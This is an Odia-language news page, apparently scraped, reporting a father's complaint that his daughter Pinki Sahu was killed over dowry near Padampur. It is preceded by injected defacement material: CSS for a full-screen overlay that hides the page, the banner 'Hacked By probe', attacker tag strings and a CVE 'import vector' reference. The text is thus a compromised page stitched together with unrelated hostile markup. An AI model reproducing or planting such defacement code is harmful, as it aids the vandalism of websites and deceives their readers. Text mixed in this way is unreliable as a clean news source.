html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

 ଯୌତୁକ ପାଇଁ ଝିଅକୁ ହତ୍ୟା କରିଥିବା ଅଭିଯୋଗ କଲେ ବାପା ।

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ପଦ୍ମପୁର : ପ୍ରଥମେ ପ୍ରେମ ବିବାହ ତାପରେ ଯୌତୁକ ଦାବୀ ଏବଂ ଶେଷରେ ହତ୍ୟା  । ଏଭଲ ଅଭାବନୀୟ ଘଟଣାର ଅଭିଯୋଗ ଆସିଛି ପଦ୍ମପୁର ଉପଖଣ୍ଡ ଗାଇସିଲାଟ ଥାନା ଅଞ୍ଚଳରୁ । ଅଭିଯୋଗ ଅନୁସାରେ  । ଥାନା ବଡ଼ସାହାଜବାହାଲ ଗାଁର ପିଙ୍କି ସାହୁ ତିନି ବର୍ଷ ପୂର୍ବେ ଟୁରଚା ଗାଁର ଅଶୋକ ସାହୁଙ୍କୁ ପ୍ରେମ ବିବାହ କରିଥିଲେ । ବିବାହର କିଛିଦିନ ପରେ ପିଙ୍କି କୁ ଅଶୋକ ଯୌତୁକ ଦାବି କରିଥିଲେ ଏବଂ ତାଙ୍କ ବାପଘରୁ ଆଣିବା ପାଇଁ ଚାପ ପକାଇବା ସହ ଶାରିରୀକ ଓ ମାନସିକ ନିର୍ଯ୍ୟାତନା ଦେଉଥିଲେ । ହେଲେ ଆଜି ସକାଳୁ ପିଙ୍କିର ମୄତ୍ୟୁ ଖବର ତାଙ୍କ ପରିବାରକୁ ଦିଆଯାଇଥିଲା । ଝିଅର ପରିବାର ପକ୍ଷରୁ ପିଙ୍କିର ମୄତ୍ୟୁ ସ୍ବାବାଭିକ ଭାବରେ ହୋଇନାହିଁ ଏବଂ ଯୌତୁକ ପାଇଁ ତାଙ୍କ ଝିଅକୁ ହତ୍ୟା କରାଯାଇଛି ବୋଲି ମୄତ ଝିଅର ବାପା କୁଳମଣି ସାହୁ ଗାଇସିଲାଟ ଥାନାରେ ଲିଖିତ ଭାବେ ଜଣାଇଛନ୍ତି । ଗାଇସିଲାଟ ପୋଲିସ ଟୁରଚା ଗ୍ରାମକୁ ଯାଇ ଶବ ଜବତ କରିବା ସହ ଶବ ବ୍ୟବଛ୍ଛେଦ ପାଇ ପଠାଇ ଅଧିକ ତଦନ୍ତ ଜାରି ରଖିଛି ।

0
0
0
s2sdefault